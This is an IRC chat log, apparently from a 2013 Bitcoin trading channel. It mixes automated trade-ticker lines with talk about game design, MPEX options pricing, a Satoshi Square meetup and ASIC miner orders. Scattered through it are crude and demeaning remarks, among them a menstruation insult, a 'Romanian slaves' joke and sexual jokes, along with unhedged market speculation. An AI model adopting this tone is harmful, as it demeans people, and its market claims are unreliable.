[ASICMINER-PT] 4 @ 4.351 = 17.404 BTC [-] Jul 08 18:05:18 [BTCTC] [ASICMINER-PT] 3 @ 4.3501 = 13.0503 BTC [-] Jul 08 18:05:51 ThickAsThieves: but that actually doesn't have to matter. In Mario all of the sprites are practically the same because of hardware limitations. Jul 08 18:05:53 not at all Jul 08 18:06:00 ok, there are similarities Jul 08 18:06:08 it mattered to me Jul 08 18:06:08 i mean, the metaverse could be looked at like an mmorpg Jul 08 18:06:11 and i wasnt alone Jul 08 18:06:29 because mario, is not an argument Jul 08 18:06:29 Yes but if the gameplay were new and they weren't obviously milking you would you really care? Jul 08 18:06:55 equipment as a carrot is a huge part of WoW Jul 08 18:07:17 if the carrot is stale, the chase is staler for it Jul 08 18:07:42 Wasn't that the case in Diablo II years before? Jul 08 18:08:05 It's like Gatsby syndrome without the prohibition... Jul 08 18:08:12 i think it's an overlooked and undervalued aspect of gaming, original new art Jul 08 18:08:23 MTG is a good example Jul 08 18:08:27 they see that value Jul 08 18:08:48 MTG also has artist on call that rivals a comic book publisher. Jul 08 18:08:50 what do you think of league of legends Jul 08 18:08:50 [BTCTC] [DMS.PURCHASE] 8 @ 0.048994 = 0.392 BTC [-] Jul 08 18:08:52 artists* Jul 08 18:09:02 i think it is a hugely popular game that has monetized in a great way Jul 08 18:09:17 It only exists because blizzard made Warcraft 3 Jul 08 18:09:25 while not only keeping it about gameplay, but also making it competitive and lucrative Jul 08 18:09:26 and from Warcraft 3 came DoTA Jul 08 18:09:30 yes of course Jul 08 18:09:32 its a DOTA clone Jul 08 18:09:33 I was never a huge DoTA fan Jul 08 18:09:41 never played any of those Jul 08 18:09:43 sue me Jul 08 18:09:48 well, its fun Jul 08 18:09:54 and not a huge time commitment Jul 08 18:10:03 though there is leveling and decision trees to some extent Jul 08 18:10:14 i think my bro gifted me dota on steam recently Jul 08 18:10:41 It can be, but it just was too...simple in comparison to the rush of a 1v1 in Starcraft or Warcraft III. But I can see the allure. Jul 08 18:10:48 only game i put any mentionable time into in recent years is Skyrim Jul 08 18:10:52 and Plants v Zombies Jul 08 18:10:56 :) Jul 08 18:11:04 Two things have assured T’Rain’s commercial success: actual geological laws have been programmed to govern its terrain (it is this feature from which the game’s name derives); and the game uses a currency system based on real money — treasure mined from the strata of T’Rain’s crust can be transformed into earthly coin. Jul 08 18:11:22 that sounds exactly (or pretty close) to S.MG Jul 08 18:11:50 that is the game in REAMDE Jul 08 18:11:52 and eerily similar to the "The World" of .hack//anythinghere Jul 08 18:12:01 i dont think S.MG generates coin at all Jul 08 18:12:03 it consumes it Jul 08 18:12:08 no, coins are put into it Jul 08 18:12:10 and offers ways for you to sell things for it Jul 08 18:12:23 but things cost money and crafting combines value Jul 08 18:12:41 i *think* that the money you put in is not all yours though Jul 08 18:12:45 i think only consumables are planned to cost money, like food Jul 08 18:12:51 mjr_: you would have liked the original incarnation of Star Wars Galaxies Jul 08 18:12:54 some goes to trees, metal etc, from the rough description i heard Jul 08 18:13:37 mjr_: ALl of the items in the game had to be crafted. Jul 08 18:14:06 mjr_: so corporations of course formed to rape the planets of their resources. Jul 08 18:14:49 lol cool Jul 08 18:14:57 but how did the trees get there Jul 08 18:15:13 I dont think there was a tree resource Jul 08 18:15:23 ah ok Jul 08 18:15:35 I think minecraft has that on lock down (jkjk) Jul 08 18:15:38 [BTCTC] [DMS.MINING] 1 @ 0.01861 BTC [-] Jul 08 18:15:39 [BTCTC] [DMS.MINING] 100 @ 0.0186 = 1.86 BTC [-] Jul 08 18:15:41 [BTCTC] [DMS.MINING] 4 @ 0.0186 = 0.0744 BTC [-] Jul 08 18:15:42 [BTCTC] [DMS.MINING] 95 @ 0.0181 = 1.7195 BTC [-] Jul 08 18:15:43 anyways, tying a game to something meaningful is usually a recipe for successs Jul 08 18:15:56 lol MC is pretty fun Jul 08 18:16:03 lets people be creative and build stuf Jul 08 18:17:34 [BTCTC] [DMS.PURCHASE] 50 @ 0.048994 = 2.4497 BTC [-] Jul 08 18:19:14 Did anyone here play DAoC? Jul 08 18:21:52 ThickAsThieves: do you know why GTA has become so successful? Because of the subtle and gross content you desire in a game. Lets take Fruit computers for example: http://www.grandtheftwiki.com/images/FruitComputers-GTAVCS-advert.png That advert is from Vice City, which takes play in the 80's. The fake brand perpetuates throughout the entire series. Only hardcore players will actually read the shit, but it's still Jul 08 18:22:16 [BTCTC] [AMC-PT] 5 @ 0.001944 = 0.0097 BTC [+] Jul 08 18:23:01 MP wants to create that kind of world in his flagship game. How he does it is irrelevant, but it's a vast undertaking. To underestimate such an endeavor is practically suicide. Jul 08 18:24:09 he has romanian slaves working in sweatshops for the AI, it's going to rock Jul 08 18:24:35 but there is no official name convention actually there is. http://trilema.com/2012/mpsics-in-detail/ Jul 08 18:24:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.0439 BTC [+] Jul 08 18:25:19 [BTCTC] [TAT.ASICMINER] 20 @ 0.043899 = 0.878 BTC [-] Jul 08 18:25:35 davout: that's what Atari did, and look at them now... Jul 08 18:26:06 lol Jul 08 18:26:19 davout: I respect the shit out of MP, but I question his game company. I wish I could have faith. I WANT TO BELIEVE ThickAsThieves Jul 08 18:26:21 I WANT TO BELIEVE!!!! Jul 08 18:26:55 so believe Jul 08 18:27:11 it doesn't require such concern to believe Jul 08 18:27:57 http://i1.kym-cdn.com/photos/images/original/000/026/651/believe.gif Jul 08 18:28:05 very fitting Jul 08 18:28:56 http://www.grandtheftwiki.com/images/IFruitphone-GTAIV-advert.png - I want one. Jul 08 18:35:19 [BTCTC] [TAT.ASICMINER] 35 @ 0.0439 = 1.5365 BTC [+] Jul 08 18:35:51 [BTCTC] [DMS.MINING] 20 @ 0.018101 = 0.362 BTC [+] Jul 08 18:35:56 [BTCTC] [DMS.MINING] 5 @ 0.0181 = 0.0905 BTC [-] Jul 08 18:35:59 [BTCTC] [DMS.MINING] 16 @ 0.018 = 0.288 BTC [-] Jul 08 18:36:01 [BTCTC] [DMS.MINING] 17 @ 0.018 = 0.306 BTC [-] Jul 08 18:36:53 just to throw this out there Jul 08 18:37:08 if anyone is in NYC and wants to come to Satoshi Square, its in Union Square from 5-7pm Jul 08 18:37:27 north side of the park, by the Lincoln Statue Jul 08 18:38:10 Y u no come to Montreal?!? Jul 08 18:38:22 Build a Bitcoin monument or something Jul 08 18:38:37 Declare it Bitcoin Capital of the world. Jul 08 18:38:39 i really really want to go to montreal Jul 08 18:38:42 i would love that Jul 08 18:38:48 i hear it is an awesome town Jul 08 18:38:53 Love it. Jul 08 18:38:59 and would love to visit and help organize an event there Jul 08 18:39:32 Cheap housing, cheap living costs. Compared to most major urban cities Jul 08 18:39:39 i was just thinking actually of a tool that would be nice, (i need to add a calendar anyway), but a consensus building location chooser for new groups meeting Jul 08 18:39:43 All on an island. Jul 08 18:39:47 not necessary, but would be nice Jul 08 18:42:16 so much to be done... Jul 08 18:44:06 [HAVELOCK] [ASICM] 100 @ 0.04499989 = 4.5 BTC [+] Jul 08 18:44:08 [HAVELOCK] [ASICM] 56 @ 0.0449999 = 2.52 BTC [+] Jul 08 18:44:22 Namworld: no no no Jul 08 18:44:35 [HAVELOCK] [ASICM] 8 @ 0.045 = 0.36 BTC [+] Jul 08 18:44:37 [HAVELOCK] [ASICM] 7 @ 0.045 = 0.315 BTC [+] Jul 08 18:44:37 canada is not going to get a bitcoin capital Jul 08 18:44:38 [HAVELOCK] [ASICM] 12 @ 0.045 = 0.54 BTC [+] Jul 08 18:45:10 [HAVELOCK] [ASICM] 38 @ 0.045 = 1.71 BTC [+] Jul 08 18:45:12 [HAVELOCK] [ASICM] 68 @ 0.045 = 3.06 BTC [+] Jul 08 18:45:12 [HAVELOCK] [ASICM] 94 @ 0.045 = 4.23 BTC [+] Jul 08 18:45:27 [HAVELOCK] [ASICM] 6 @ 0.045 = 0.27 BTC [+] Jul 08 18:45:52 [HAVELOCK] [ASICM] 14 @ 0.045399 = 0.6356 BTC [+] Jul 08 18:46:17 [HAVELOCK] [ASICM] 50 @ 0.045399 = 2.27 BTC [+] Jul 08 18:46:26 well, if canada were to have a bitcoin capital, i think montreal would be perfect Jul 08 18:47:08 it has that  je ne sais quoi Jul 08 18:47:32 not to mention super hot girls at great strip clubs Jul 08 18:47:40 that was the quoi i was looking for Jul 08 18:49:23 So I'm thinking of cancelling my bfl order for 3 singles, they're saying preorders placed before Jan 2013, will now ship out by Sept, then you have all of Feb-April crap. Mine was placed in April Jul 08 18:50:58 [BTCTC] [ASICMINER-PT] 1 @ 4.38 BTC [+] Jul 08 18:51:31 ouch Jul 08 18:51:41 didnt they cancel refunds? Jul 08 18:52:28 If you ordered after April yeah Jul 08 18:52:39 [HAVELOCK] [ASICM] 15 @ 0.043503 = 0.6525 BTC [-] Jul 08 18:52:43 [HAVELOCK] [ASICM] 34 @ 0.04350199 = 1.4791 BTC [-] Jul 08 18:52:48 I'm just thinking it makes more sense to cancel and buy a Saturn instead Jul 08 18:52:56 or buy btc Jul 08 18:53:00 or buy AM stock Jul 08 18:53:00 that as well Jul 08 18:53:03 lol Jul 08 18:53:04 or buy bonds Jul 08 18:53:16 or use it for toilet paper Jul 08 18:53:34 Might as well been tp all this time Jul 08 18:54:16 I'm actually investing in TP. because http://www.guardian.co.uk/world/2013/may/16/venezuela-toilet-paper-shortage-50m Jul 08 18:54:28 Ah good catch Jul 08 18:55:41 best part of the article Minister blames shortage on 'excessive demand caused by media campaign generated to disrupt the country' Jul 08 18:56:49 [BTCTC] [TAT.ASICMINER] 51 @ 0.0439 = 2.2389 BTC [+] Jul 08 19:04:41 [HAVELOCK] [ASICM] 30 @ 0.045399 = 1.362 BTC [+] Jul 08 19:06:37 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004776 = 0.0096 BTC [+] Jul 08 19:12:55 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004776 = 0.0239 BTC [+] Jul 08 19:19:46 [BTCTC] [DMS.MINING] 1 @ 0.019275 BTC [+] Jul 08 19:19:48 [BTCTC] [DMS.MINING] 10 @ 0.019275 = 0.1928 BTC [+] Jul 08 19:22:20 [BTCTC] [TAT.VIRTUALMINE] 37 @ 0.004621 = 0.171 BTC [-] Jul 08 19:22:22 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00462 BTC [-] Jul 08 19:24:21 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004776 BTC [+] Jul 08 19:25:37 [HAVELOCK] [HIM] 4 @ 0.31001711 = 1.2401 BTC [-] Jul 08 19:25:43 [HAVELOCK] [HIM] 5 @ 0.31001508 = 1.5501 BTC [-] Jul 08 19:25:54 [HAVELOCK] [HIM] 3 @ 0.3003 = 0.9009 BTC [-] Jul 08 19:28:46 [BTCTC] [AMC-PT] 9 @ 0.001935 = 0.0174 BTC [-] Jul 08 19:31:45 [HAVELOCK] [HIM] 10 @ 0.3003 = 3.003 BTC [-] Jul 08 19:36:16 [BTCTC] [B.YABMC] 1 @ 0.0051 BTC [-] Jul 08 19:39:17 [BTCTC] [TAT.ASICMINER] 10 @ 0.0436 = 0.436 BTC [-] Jul 08 19:39:19 [BTCTC] [TAT.ASICMINER] 5 @ 0.0436 = 0.218 BTC [-] Jul 08 19:40:15 [BTCTC] [ASICMINER-PT] 1 @ 4.424997 BTC [+] Jul 08 19:41:08 [BTCTC] [TAT.ASICMINER] 8 @ 0.0435 = 0.348 BTC [-] Jul 08 19:41:18 [BTCTC] [ASICMINER-PT] 1 @ 4.425 BTC [+] Jul 08 19:41:20 [BTCTC] [ASICMINER-PT] 2 @ 4.425 = 8.85 BTC [+] Jul 08 19:41:42 [BTCTC] [RSM] 2 @ 0.016005 = 0.032 BTC [-] Jul 08 19:45:12 [HAVELOCK] [ASICM] 481 @ 0.045379 = 21.8273 BTC [-] Jul 08 19:45:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.0439 = 0.0878 BTC [+] Jul 08 19:45:33 [HAVELOCK] [ASICM] 225 @ 0.04538 = 10.2105 BTC [+] Jul 08 19:46:31 [HAVELOCK] [ASICM] 1 @ 0.0449 BTC [-] Jul 08 19:46:32 [HAVELOCK] [ASICM] 72 @ 0.04441 = 3.1975 BTC [-] Jul 08 19:46:34 [HAVELOCK] [ASICM] 1 @ 0.0444 BTC [-] Jul 08 19:46:35 [HAVELOCK] [ASICM] 526 @ 0.044301 = 23.3023 BTC [-] Jul 08 19:46:37 [HAVELOCK] [ASICM] 2 @ 0.0454 = 0.0908 BTC [+] Jul 08 19:46:39 [HAVELOCK] [ASICM] 200 @ 0.0454 = 9.08 BTC [+] Jul 08 19:47:18 [HAVELOCK] [ASICM] 163 @ 0.045499 = 7.4163 BTC [+] Jul 08 19:48:05 [HAVELOCK] [ASICM] 35 @ 0.04545 = 1.5908 BTC [-] Jul 08 19:48:43 [BTCTC] [TAT.ASICMINER] 10 @ 0.0439 = 0.439 BTC [+] Jul 08 19:49:40 mjr_, ThickAsThieves: iirc mircea *did* change the options pricing algo in april or may. the prices used to be better before. it's even mentioned in monthly report. Jul 08 19:52:05 [BTCTC] [COGNITIVE] 1 @ 0.279 BTC [+] Jul 08 19:52:21 right Jul 08 19:52:46 i'm saying he doesn't like changing them as it is a form of defeat Jul 08 19:53:08 now he may have over-corrected Jul 08 19:53:34 and change in the other direction is waiting to happen, but he is waiting for mid-market competition as a reason Jul 08 19:54:00 so in both directions he will only change when he feels he's "lost" enough money Jul 08 19:54:33 this is a theory Jul 08 19:54:38 more than a criticism Jul 08 19:56:16 [BTCTC] [S.MPOE-PT] 5 @ 0.000896 = 0.0045 BTC [-] Jul 08 19:56:16 what other options Jul 08 19:56:39 he's still the only one backing real options Jul 08 19:56:52 albeit pricey ones atm Jul 08 19:57:13 [BTCTC] [S.MPOE-PT] 1 @ 0.000896 BTC [-] Jul 08 19:57:56 [BTCTC] [BASIC-MINING] 1 @ 0.18897 BTC [+] Jul 08 19:58:12 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004777 BTC [+] Jul 08 19:58:19 *hint* it would be possible for mpex whale to ask mp for margin and use that to cover options Jul 08 19:58:59 but maybe they deem it too risky as well Jul 08 19:59:07 [BTCTC] [S.MPOE-PT] 1 @ 0.000896 BTC [-] Jul 08 19:59:12 that was basiclaly what mjr and i were discussing Jul 08 19:59:24 whther the real reason for the pricing is risk assessment Jul 08 19:59:33 or just over-correction Jul 08 19:59:50 and whether playing the midmarket is low-risk enough to play Jul 08 20:01:23 i know. imho he probably uses worst possible scenario of price swing by 300% or so whereby all options are bought on one extremity and exercised on the other Jul 08 20:03:22 Goat, all you seem to have to contribute lately is tearing people down and propping yourself up, are you on the rag or something? Jul 08 20:03:35 or am i just late noticing this Jul 08 20:05:52 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004777 BTC [+] Jul 08 20:09:34 yes you're late goat said himself he's just trolling around Jul 08 20:10:29 pls send tips to: 1ChaangNoiGoat1sFai1edTro1138vpJo Jul 08 20:11:22 [BTCTC] [TAT.ASICMINER] 9 @ 0.0439 = 0.3951 BTC [+] Jul 08 20:12:44 [BTCTC] [DMS.PURCHASE] 39 @ 0.048997 = 1.9109 BTC [+] Jul 08 20:15:47 call me new all you want, but my relevance here has eclipsed yours months ago Jul 08 20:16:14 what i think doesn't matter Jul 08 20:16:54 surely you have more to contribute than being another MP-is-a-scammer troll Jul 08 20:17:46 k Jul 08 20:17:59 lol Jul 08 20:18:58 [BTCTC] [DMS.MINING] 2 @ 0.019276 = 0.0386 BTC [+] Jul 08 20:19:57 dunno, but prolly he did....otherwise he would be asking me about how many THs i have Jul 08 20:20:05 [BTCTC] [DMS.SELLING] 1 @ 0.030998 BTC [+] Jul 08 20:20:17 [BTCTC] [AMC-PT] 923 @ 0.001944 = 1.7943 BTC [+] Jul 08 20:20:24 lol, that would prolly require petahashes Jul 08 20:21:57 [BTCTC] [ASICMINER-PT] 1 @ 4.4249 BTC [-] Jul 08 20:22:30 ;;bcstats Jul 08 20:22:33 Current Blocks: 245510 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 441 blocks | Next Difficulty In About: 2 days, 9 hours, 50 minutes, and 9 seconds | Next Difficulty Estimate: 25598818.434 | Estimated Percent Change: 19.98324 Jul 08 20:22:45 [BTCTC] [BITVPS] 225 @ 0.002231 = 0.502 BTC [+] Jul 08 20:22:53 One atacirc is 6 petabytes of variable use memory, infinite parallel processor the size of a match head. Jul 08 20:23:22 no it's applied phlebotinum (alien tech) Jul 08 20:23:39 [BTCTC] [BITVPS] 25 @ 0.002231 = 0.0558 BTC [+] Jul 08 20:24:11 [BTCTC] [BITVPS] 1 @ 0.002232 BTC [+] Jul 08 20:24:13 [BTCTC] [ASICMINER-PT] 1 @ 4.425 BTC [+] Jul 08 20:24:26 John Ringo - Live Free Or Die Jul 08 20:24:29 [BTCTC] [BITVPS] 34 @ 0.002234 = 0.076 BTC [+] Jul 08 20:25:44 19%, shit Jul 08 20:26:16 quite good fic... like, imagine mircea popescu being the first to successfully trade with aliens Jul 08 20:26:30 minus the slavery Jul 08 20:27:17 books Jul 08 20:27:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.0439 BTC [+] Jul 08 20:27:40 [BTCTC] [ASICMINER-PT] 1 @ 4.425 BTC [+] Jul 08 20:29:07 lol Jul 08 20:29:28 what Jul 08 20:29:29 let's start leetcoin ETF Jul 08 20:32:14 [BTCTC] [AMC-PT] 25 @ 0.001998 = 0.05 BTC [+] Jul 08 20:32:26 I assume not valid Jul 08 20:33:00 heh Jul 08 20:33:42 you do realize I was kidding earlier, right? Jul 08 20:33:49 [BTCTC] [ASICMINER-PT] 1 @ 4.357009 BTC [-] Jul 08 20:33:58 its a running joke about obviously fake vanity addresses Jul 08 20:34:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.04355 = 0.4355 BTC [-] Jul 08 20:37:33 [MPEX] [O.USD.C071T] 3 @ 0.34354301 = 1.0306 BTC Jul 08 20:38:19 [MPEX] [O.USD.P071T] 3 @ 0.36565773 = 1.097 BTC Jul 08 20:39:18 !ticker m ^oix Jul 08 20:39:19 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 60.45035313 / 61.7052854 / 120.48109686 (1421 shares, 862.62 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Jul 08 20:39:53 ^ says there was 862btc traded last week in options Jul 08 20:40:41 no it is computed only on week basis Jul 08 20:41:18 day/month is only empty placeholder for the bot Jul 08 20:41:27 [BTCTC] [AMC-PT] 824 @ 0.001999 = 1.6472 BTC [+] Jul 08 20:41:28 [BTCTC] [AMC-PT] 100 @ 0.001999 = 0.1999 BTC [+] Jul 08 20:41:30 [BTCTC] [AMC-PT] 20 @ 0.001999 = 0.04 BTC [+] Jul 08 20:42:43 i see mostly O.USD.C113T/O.USD.C107T... if the weren't shorted, means nice dividend for s.mpoe Jul 08 20:43:22 ofc, also if price keeps stable Jul 08 20:44:03 no they weren't shorted. iirc mp said shorts don't go into OIX. Jul 08 20:46:37 hm, 715 of O.USD.P095T, 655 O.USD.P101T sold? but they most likely aren't in money as well Jul 08 20:47:44 [BTCTC] [BTC-BOND] 10 @ 0.009998 = 0.1 BTC [+] Jul 08 20:48:00 i do... but not mine Jul 08 20:48:27 whose large balls do you have jurov? Jul 08 20:48:29 :) Jul 08 20:49:05 [BTCTC] [AMC-PT] 3 @ 0.002 = 0.006 BTC [+] Jul 08 20:49:31 [BTCTC] [AMC-PT] 17 @ 0.002 = 0.034 BTC [+] Jul 08 20:49:33 [BTCTC] [AMC-PT] 75 @ 0.001998 = 0.1499 BTC [-] Jul 08 20:49:34 [BTCTC] [AMC-PT] 233 @ 0.001935 = 0.4509 BTC [-] Jul 08 20:49:36 [BTCTC] [AMC-PT] 12 @ 0.0019 = 0.0228 BTC [-] Jul 08 20:49:37 [BTCTC] [AMC-PT] 483 @ 0.00189 = 0.9129 BTC [-] Jul 08 20:50:06 [HAVELOCK] [SDICE] 1 @ 0.20759998 BTC [+] Jul 08 20:50:11 what would govt accuse me of? i'm just humble service provider Jul 08 20:50:12 i had no idea... Jul 08 20:50:48 somalia Jul 08 20:50:56 yeah oix is long only Jul 08 20:52:05 yes they do. apparently the warlords even managed to maintain functional cellphone network Jul 08 20:52:48 yes. some libertard even really use that as an argument that "it's possible" Jul 08 20:53:12 never mind some luxuries as tap water or so Jul 08 20:54:36 flaying goat Jul 08 20:55:04 Sounds like the life Jul 08 20:55:44 which part of world do you fly to? Jul 08 20:55:53 so we know what to nuke from orbit Jul 08 20:56:41 NZ sounds nice at least Jul 08 20:57:53 you gonna water the park? i thought the city workers take care of that. Jul 08 20:57:59 [BTCTC] [TAT.ASICMINER] 54 @ 0.0435 = 2.349 BTC [-] Jul 08 20:58:06 [BTCTC] [TAT.ASICMINER] 46 @ 0.0435 = 2.001 BTC [-] Jul 08 21:01:38 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004651 BTC [-] Jul 08 21:01:38 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.00465 = 0.0372 BTC [-] Jul 08 21:01:47 [BTCTC] [ASICMINER-PT] 2 @ 4.425 = 8.85 BTC [+] Jul 08 21:10:31 [BTCTC] [DMS.MINING] 18 @ 0.019276 = 0.347 BTC [+] Jul 08 21:10:52 [BTCTC] [DMS.MINING] 16 @ 0.019279 = 0.3085 BTC [+] Jul 08 21:11:20 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.004744 = 0.0142 BTC [+] Jul 08 21:11:59 [BTCTC] [DMS.MINING] 27 @ 0.019497 = 0.5264 BTC [+] Jul 08 21:12:00 [BTCTC] [DMS.MINING] 25 @ 0.019498 = 0.4875 BTC [+] Jul 08 21:12:01 [BTCTC] [DMS.MINING] 14 @ 0.019499 = 0.273 BTC [+] Jul 08 21:12:45 [BTCTC] [DMS.MINING] 12 @ 0.019499 = 0.234 BTC [+] Jul 08 21:12:47 [BTCTC] [DMS.MINING] 24 @ 0.019499 = 0.468 BTC [+] Jul 08 21:15:17 [BTCTC] [TAT.ASICMINER] 28 @ 0.0435 = 1.218 BTC [-] Jul 08 21:15:19 [BTCTC] [TAT.ASICMINER] 56 @ 0.043002 = 2.4081 BTC [-] Jul 08 21:15:21 [BTCTC] [TAT.ASICMINER] 16 @ 0.043001 = 0.688 BTC [-] Jul 08 21:16:31 [BTCTC] [RSM] 10 @ 0.016006 = 0.1601 BTC [+] Jul 08 21:22:06 [BTCTC] [DMS.SELLING] 1 @ 0.030998 BTC [+] Jul 08 21:25:04 [BTCTC] [DMS.PURCHASE] 10 @ 0.048997 = 0.49 BTC [+] Jul 08 21:27:19 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00459 = 0.0138 BTC [-] Jul 08 21:28:07 [BTCTC] [TAT.VIRTUALMINE] 73 @ 0.004582 = 0.3345 BTC [-] Jul 08 21:28:33 [HAVELOCK] [ASICM] 5 @ 0.0444 = 0.222 BTC [-] Jul 08 21:29:05 omfg look at all the stuff people said about me while i was away! Jul 08 21:29:11 hehe Jul 08 21:29:18 mjr_ of course it' Jul 08 21:29:24 scammers don't get to speak for themselves! Jul 08 21:29:28 s different if there's 1 day or 30 days left man. Jul 08 21:29:41 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004581 BTC [-] Jul 08 21:29:43 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00458 BTC [-] Jul 08 21:33:30 [BTCTC] [BITVPS] 5 @ 0.0022 = 0.011 BTC [-] Jul 08 21:34:03 [HAVELOCK] [ASICM] 5 @ 0.044 = 0.22 BTC [-] Jul 08 21:34:12 [HAVELOCK] [ASICM] 25 @ 0.04385 = 1.0963 BTC [-] Jul 08 21:34:21 [HAVELOCK] [ASICM] 9 @ 0.04381 = 0.3943 BTC [-] Jul 08 21:34:31 [HAVELOCK] [ASICM] 1 @ 0.0431 BTC [-] Jul 08 21:34:39 [HAVELOCK] [ASICM] 1 @ 0.0422001 BTC [-] Jul 08 21:34:47 [HAVELOCK] [ASICM] 109 @ 0.04210001 = 4.5889 BTC [-] Jul 08 21:36:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.04355 BTC [+] Jul 08 21:40:18 [BTCTC] [DMS.MINING] 3 @ 0.019499 = 0.0585 BTC [+] Jul 08 21:43:07 [BTCTC] [DMS.MINING] 2 @ 0.019499 = 0.039 BTC [+] Jul 08 21:43:11 [BTCTC] [ASICMINER-PT] 2 @ 4.39 = 8.78 BTC [-] Jul 08 21:44:47 ThickAsThieves finally found it! Jul 08 21:44:54 it wasnt an article, it was a comment Jul 08 21:44:55 "I don’t think it’s either practical nor feasible nor even desirable to use Bitcoin in the day to day dabble of pizzas, phone credits, hairspray and sneakers" Jul 08 21:44:59 http://trilema.com/2013/bitcoin-prices-bitcoin-inflexibility/#comment-92015 Jul 08 21:45:02 Bitcoin prices, Bitcoin inflexibility pe Trilema - Un blog de Mircea Popescu. Jul 08 21:46:18 [BTCTC] [BITVPS] 25 @ 0.0022 = 0.055 BTC [-] Jul 08 21:47:57 new mpex slogan? Jul 08 21:48:02 Risk is a Luxury Jul 08 21:48:45 hehe i couldn't take the credit for that one. Jul 08 21:49:50 [BTCTC] [TAT.VIRTUALMINE] 16 @ 0.00474 = 0.0758 BTC [+] Jul 08 21:50:29 so how does it play out then? a horde of bitcoiners trying to use bitcoin as a currency and molding it to such Jul 08 21:50:43 and bitcoiners vulutring over the fiat exchange rate Jul 08 21:51:14 does it all end with them failing and the powerful holding most of the coin? Jul 08 21:51:19 "end" Jul 08 21:51:36 this is why i call it risk as a luxury Jul 08 21:51:51 because if you are right, it's a a pretty big risk play Jul 08 21:52:03 assuming it will end up as you imagine Jul 08 21:52:29 [BTCTC] [TAT.VIRTUALMINE] 17 @ 0.00474 = 0.0806 BTC [+] Jul 08 21:52:59 bitcoin can't be moulded tho is the thing. Jul 08 21:53:04 they'll mould themselves. Jul 08 21:53:41 people like to think of bitcoin in terms of it being a thing, like an iphone. Jul 08 21:53:55 however, this is not the case. bitcoin is in fact a law, like gravity, Jul 08 21:54:10 the way i start explaining to people usually begins with, Jul 08 21:54:13 in no sense under the control of it's "inventor", who's in fact a discoveror. Jul 08 21:54:32 "yknow what the invention of the internet did to business and communication? it's like that for money" Jul 08 21:54:46 something of the sort yes Jul 08 21:54:50 i prefer anal sex. Jul 08 21:54:53 lol Jul 08 21:55:05 whenever people want to know who satoshi really was... well.. he was the ONE DUDE who invented sticking it in the poop[er. Jul 08 21:55:35 this changes everything! Jul 08 21:55:41 mircea_popescu, you come out with some crazy shit sometimes, but because it's interesting, I stay :P Jul 08 21:55:47 now... make it illegal today and you'll make it mandatory tomorrow. Jul 08 21:55:57 matthew_boyd i think you speak for most people here when you say that. Jul 08 21:56:10 haha, I gathered that : ) Jul 08 22:03:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.043551 = 0.1307 BTC [+] Jul 08 22:03:19 [BTCTC] [DMS.PURCHASE] 1 @ 0.048997 BTC [+] Jul 08 22:03:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.04355 = 0.0871 BTC [-] Jul 08 22:13:38 [BTCTC] [TAT.ASICMINER] 10 @ 0.0437 = 0.437 BTC [+] Jul 08 22:13:50 [BTCTC] [DMS.PURCHASE] 25 @ 0.048997 = 1.2249 BTC [+] Jul 08 22:19:14 [BTCTC] [TAT.VIRTUALMINE] 96 @ 0.004461 = 0.4283 BTC [-] Jul 08 22:19:16 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00446 = 0.223 BTC [-] Jul 08 22:19:18 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.004453 = 0.0534 BTC [-] Jul 08 22:19:19 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00445 = 0.0223 BTC [-] Jul 08 22:19:20 [BTCTC] [TAT.VIRTUALMINE] 35 @ 0.0044 = 0.154 BTC [-] Jul 08 22:19:22 [BTCTC] [TAT.VIRTUALMINE] 21 @ 0.0044 = 0.0924 BTC [-] Jul 08 22:19:46 [BTCTC] [AMC-PT] 20 @ 0.00212 = 0.0424 BTC [+] Jul 08 22:22:54 [BTCTC] [BASIC-MINING] 1 @ 0.1899 BTC [+] Jul 08 22:22:56 [BTCTC] [BASIC-MINING] 1 @ 0.194617 BTC [+] Jul 08 22:22:57 [BTCTC] [BASIC-MINING] 4 @ 0.1998 = 0.7992 BTC [+] Jul 08 22:22:59 [BTCTC] [BASIC-MINING] 4 @ 0.1999 = 0.7996 BTC [+] Jul 08 22:23:00 [BTCTC] [BASIC-MINING] 10 @ 0.199999 = 2 BTC [+] Jul 08 22:23:01 [BTCTC] [BASIC-MINING] 10 @ 0.2 = 2 BTC [+] Jul 08 22:23:02 [BTCTC] [BASIC-MINING] 40 @ 0.2 = 8 BTC [+] Jul 08 22:23:42 [BTCTC] [DMS.SELLING] 1 @ 0.0308 BTC [-] Jul 08 22:25:35 ;;bcstats Jul 08 22:25:38 Current Blocks: 245529 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 422 blocks | Next Difficulty In About: 2 days, 6 hours, 27 minutes, and 5 seconds | Next Difficulty Estimate: 25656761.3422 | Estimated Percent Change: 20.25482 Jul 08 22:27:04 [BTCTC] [BASIC-MINING] 3 @ 0.2 = 0.6 BTC [+] Jul 08 22:27:05 [BTCTC] [BASIC-MINING] 11 @ 0.2 = 2.2 BTC [+] Jul 08 22:27:07 [BTCTC] [BASIC-MINING] 5 @ 0.2 = 1 BTC [+] Jul 08 22:27:07 [BTCTC] [BASIC-MINING] 10 @ 0.2 = 2 BTC [+] Jul 08 22:27:09 [BTCTC] [BASIC-MINING] 10 @ 0.205 = 2.05 BTC [+] Jul 08 22:27:11 